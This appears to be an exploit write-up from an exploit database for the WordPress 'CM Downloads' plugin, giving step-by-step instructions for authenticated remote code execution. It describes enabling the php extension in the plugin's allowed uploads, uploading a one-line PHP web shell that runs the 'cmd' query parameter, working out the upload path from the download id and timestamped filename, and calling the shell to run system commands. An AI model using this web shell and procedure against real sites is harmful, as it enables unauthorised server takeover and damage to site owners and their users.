## https://sploitus.com/exploit?id=WPEX-ID:D18E695B-4D6E-4FF6-A060-312594A0D2BD
##########################
Activate PHP extension:
##########################
- Log in and go to "CM Downloads" > "Settings" > "General".
- Now you can simply add php extension to "Allowed file extensions:" field because the plugin does not check for php extension.
##################################
Upload our malicious PHP file:
##################################
- Go to "CM Downloads" > "Add New".
- Upload our malicious file :
For example : malicious_php.php
<?=`$_GET[cmd]`?>
##########################
Find the right path:
##########################
We have two methods here because the code looks like:
$name = time() . '_' . sanitize_file_name($_download_file['name']);
But we don't need to write a script, we can exploit this more easily:
- Go to "CM Downloads" > "CM Downloads".
- Click on "Edit" on the name we gave to our Download and now we are redirect on a page.
- We need to get the id present in the url for the following : http://target/cmdownload/edit/id/7/ => so here it's 7
- We can find the name of our malicious file below the "Browse" button : 1660921772_malicious_php.php
- So now we can execute system command:
=> target/wp-content/uploads/cmdm/id/filename
https://target/wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=command